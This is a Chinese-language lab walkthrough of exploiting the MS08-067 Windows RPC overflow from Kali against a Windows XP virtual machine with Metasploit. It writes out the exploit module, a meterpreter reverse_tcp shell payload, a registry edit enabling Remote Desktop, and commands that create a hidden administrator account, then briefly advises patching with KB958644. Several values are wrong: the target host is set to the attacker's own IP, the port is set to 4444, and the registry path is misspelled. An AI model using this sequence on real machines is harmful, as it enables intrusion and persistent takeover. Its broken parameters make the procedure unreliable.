渗透测试实战:
准备两台虚拟机
攻击机:kali IP:192.168.10.129
靶机:WinXPenSP3 IP:192.168.10.128
漏洞描述:
Microsoft Windows Server 服务 RPC 请求缓冲区溢出漏洞
Windows的 Server 服务在处理特质 RPC 请求时存在缓冲区溢出漏洞,远程攻击者可以通过发送恶意的 RPC 请求触发这个溢出,导致完全入侵用户系统, SYSTEM 权限执行任意指令。
对于Windows 2000 、 XP 和 Server 2003 ,无需认证便可以利用该漏洞;
对于Windows Vista 和 Server 2008 ,可能需要认证。
当用户在受影响的系统上收到RPC请求时,该漏洞会允许远程执行代码,攻击者可以在未经身份验证情况下利用此漏洞运行任意代码。同时,该漏洞可以用于蠕虫攻击。它影响了某些旧版本的Windows系统,包括:
- Windows 2000
- Windows XP
- Windows Server 2003
实战步骤:
-
查询靶机是否存活(ping)192.168.10.128
-
利用nmap查询扫描
-
进入Msfconsole 使用search
-
进入漏洞模块使用 exploit/windonws/smb/ms08_067_netapi
use exploit/Windows/smb/ms08_067_netapi
或者
use 0
-
设置攻击信息
# 目标机ip
set RHOST 192.168.10.129
# 端口号
set RPORT 4444
# 设置payload
set payload windows/meterpreter/reverse_tcp
# 攻击机ip
set LHOST 192.168.10.129
# 显示配置信息
show options
-
show options 查看信息无误后执行
-
进入shell界面 创建账号建立管理员
-
命令设置注册表
REG ADD HKLM\SYSTEM\CurrentControSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
# 增加普通用户
net user yjs 123456 /add
# 提升管理员权限
net localgroup administrators yjs /add
-
然后重开一个终端使用远程桌面输入新创建的管理员
-
登录成功
总结
老系统漏洞修复更新系统升级到最新的Windows系统,安装KB958644补丁。
修改远程桌面默认端口,或关闭该服务
学习如同播种,只要你辛勤耕耘,必将收获丰硕的果实,相信你的努力不会白费。